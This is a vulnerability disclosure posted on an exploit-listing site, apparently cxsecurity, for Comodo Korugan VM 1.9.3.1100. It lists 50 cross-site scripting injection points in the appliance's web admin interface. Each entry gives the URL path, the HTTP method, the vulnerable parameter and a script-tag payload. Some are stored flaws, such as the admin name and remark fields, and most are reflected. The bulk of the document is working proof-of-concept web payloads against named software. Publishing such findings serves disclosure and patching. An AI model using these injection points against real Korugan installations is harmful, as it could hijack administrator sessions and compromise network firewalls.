Comodo KORUGAN VM 1.9.3.1100 Cross Site Scripting

2019.01.22
Credit: Ozer Goker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################################################################## # Exploit Title: Comodo KORUGAN VM 1.9.3.1100 | Cross-Site Scripting # Date: 18.01.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.korugan.com/koruganvm.php # Software Link: https://download.comodo.com/korugan/iso/Korugan-1-9-3-1100-x86_64.iso # Version: 1.9.3.1100 ################################################################################################################################## Introduction Korugan VM with all Korugan Appliance features for your virtual environments. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200:10443/korugan/login METHOD Post PARAMETER username PAYLOAD "><script>alert(1)</script> ################################################################################# XSS2 | Stored URL https://192.168.2.200:10443/korugan/admin_profiles METHOD Post PARAMETER comment PAYLOAD <script>alert(2)</script> ################################################################################# XSS3 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER admin_name PAYLOAD <script>alert(3)</script> ################################################################################# XSS4 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER name PAYLOAD <script>alert(4)</script> ################################################################################# XSS5 | Stored URL https://192.168.2.200:10443/korugan/admins METHOD Post PARAMETER surname PAYLOAD <script>alert(5)</script> ################################################################################# XSS6 | Stored URL https://192.168.2.200:10443/korugan/license_activation METHOD Post PARAMETER newLicense PAYLOAD <script>alert(6)</script> ################################################################################# XSS7 | Reflected URL https://192.168.2.200:10443/korugan/cmclient METHOD Post PARAMETER organization PAYLOAD "><script>alert(7)</script> ################################################################################# XSS8 | Reflected URL https://192.168.2.200:10443/korugan/backupschedule METHOD Post PARAMETER BACKUP_RCPTTO PAYLOAD <script>alert(8)</script> ################################################################################# XSS9 | Reflected URL https://192.168.2.200:10443/korugan/netwizard2 METHOD Post PARAMETER netmask_addr PAYLOAD <script>alert(9)</script> ################################################################################# XSS10 | Reflected URL https://192.168.2.200:10443/korugan/routing METHOD Post PARAMETER destination PAYLOAD <script>alert(10)</script> ################################################################################# XSS11 | Reflected URL https://192.168.2.200:10443/korugan/policy_routing#createrule METHOD Post PARAMETER source PAYLOAD <script>alert(11)</script> ################################################################################# XSS12 | Reflected URL https://192.168.2.200:10443/korugan/policy_routing#createrule METHOD Post PARAMETER destination PAYLOAD <script>alert(12)</script> ################################################################################# XSS13 | Reflected URL https://192.168.2.200:10443/korugan/dhcp METHOD Post PARAMETER GATEWAY_GREEN PAYLOAD <script>alert(13)</script> ################################################################################# XSS14 | Reflected URL https://192.168.2.200:10443/korugan/time METHOD Post PARAMETER NTP_SERVER_LIST PAYLOAD <script>alert(14)</script> ################################################################################# XSS15 | Reflected URL https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop METHOD Get PARAMETER ID PAYLOAD <script>alert(15)</script> ################################################################################# XSS16 | Reflected URL https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off METHOD Get PARAMETER ID PAYLOAD <script>alert(16)</script> ################################################################################# XSS17 | Reflected URL https://192.168.2.200:10443/korugan/hotspot_permanent_users METHOD Post PARAMETER MACADDRESSES PAYLOAD <script>alert(17)</script> ################################################################################# XSS18 | Reflected URL https://192.168.2.200:10443/manage/qos/devices/ METHOD Post PARAMETER device PAYLOAD <script>alert(18)</script> ################################################################################# XSS19 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER protocol PAYLOAD <script>alert(19)</script> ################################################################################# XSS20 | Reflected URL https://192.168.2.200:10443/korugan/fwgroups METHOD Post PARAMETER FWADDRESSES PAYLOAD <script>alert(20)</script> ################################################################################# XSS21 | Stored URL https://192.168.2.200:10443/korugan/schedule METHOD Post PARAMETER SCHNAME PAYLOAD <script>alert(21)</script> ################################################################################# XSS22 | Reflected URL https://192.168.2.200:10443/korugan/snat METHOD Post PARAMETER port PAYLOAD <script>alert(22)</script> ################################################################################# XSS23 | Reflected URL https://192.168.2.200:10443/korugan/snat METHOD Post PARAMETER snat_to_ip PAYLOAD <script>alert(23)</script> ################################################################################# XSS24 | Reflected URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER mac PAYLOAD <script>alert(24)</script> ################################################################################# XSS25 | Reflected URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER target PAYLOAD <script>alert(25)</script> ################################################################################# XSS26 | Stored URL https://192.168.2.200:10443/korugan/policyfw METHOD Post PARAMETER remark PAYLOAD <script>alert(26)</script> ################################################################################# XSS27 | Reflected URL https://192.168.2.200:10443/korugan/vpnfw METHOD Post PARAMETER target PAYLOAD <script>alert(27)</script> ################################################################################# XSS28 | Stored URL https://192.168.2.200:10443/korugan/vpnfw METHOD Post PARAMETER remark PAYLOAD <script>alert(28)</script> ################################################################################# XSS29 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER PROXY_PORT PAYLOAD <script>alert(29)</script> ################################################################################# XSS30 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER VISIBLE_HOSTNAME PAYLOAD <script>alert(30)</script> ################################################################################# XSS31 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER ADMIN_MAIL_ADDRESS PAYLOAD <script>alert(31)</script> ################################################################################# XSS32 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER CACHE_MEM PAYLOAD <script>alert(32)</script> ################################################################################# XSS33 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER MAX_SIZE PAYLOAD <script>alert(33)</script> ################################################################################# XSS34 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER MIN_SIZE PAYLOAD <script>alert(34)</script> ################################################################################# XSS35 | Reflected URL https://192.168.2.200:10443/korugan/proxyconfig METHOD Post PARAMETER DST_NOCACHE PAYLOAD <script>alert(35)</script> ################################################################################# XSS36 | Reflected URL https://192.168.2.200:10443/korugan/https_exceptions METHOD Post PARAMETER EXCEPTIONSITELIST PAYLOAD <script>alert(36)</script> ################################################################################# XSS37 | Reflected URL https://192.168.2.200:10443/korugan/smtpconfig METHOD Post PARAMETER VIRUS_ADMIN PAYLOAD <script>alert(37)</script> ################################################################################# XSS38 | Reflected URL https://192.168.2.200:10443/korugan/dnsmasq METHOD Post PARAMETER TRANSPARENT_SOURCE_BYPASS PAYLOAD <script>alert(38)</script> ################################################################################# XSS39 | Reflected URL https://192.168.2.200:10443/korugan/dnsmasq METHOD Post PARAMETER TRANSPARENT_DESTINATION_BYPASS PAYLOAD <script>alert(39)</script> ################################################################################# XSS40 | Reflected URL https://192.168.2.200:10443/korugan/antispyware METHOD Post PARAMETER DNSMASQ_WHITELIST PAYLOAD <script>alert(40)</script> ################################################################################# XSS41 | Reflected URL https://192.168.2.200:10443/korugan/antispyware METHOD Post PARAMETER DNSMASQ_BLACKLIST PAYLOAD <script>alert(41)</script> ################################################################################# XSS42 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER username PAYLOAD <script>alert(42)</script> ################################################################################# XSS43 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER remotenets PAYLOAD <script>alert(43)</script> ################################################################################# XSS44 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER explicitroutes PAYLOAD <script>alert(44)</script> ################################################################################# XSS45 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER static_ip PAYLOAD <script>alert(45)</script> ################################################################################# XSS46 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER custom_dns PAYLOAD <script>alert(46)</script> ################################################################################# XSS47 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_users METHOD Post PARAMETER custom_domain PAYLOAD <script>alert(47)</script> ################################################################################# XSS48 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_advanced METHOD Post PARAMETER GLOBAL_NETWORKS PAYLOAD <script>alert(48)</script> ################################################################################# XSS49 | Reflected URL https://192.168.2.200:10443/korugan/openvpn_advanced METHOD Post PARAMETER GLOBAL_DNS PAYLOAD <script>alert(49)</script> ################################################################################# XSS50 | Reflected URL https://192.168.2.200:10443/korugan/vpn_users METHOD Post PARAMETER username PAYLOAD <script>alert(50)</script> #################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top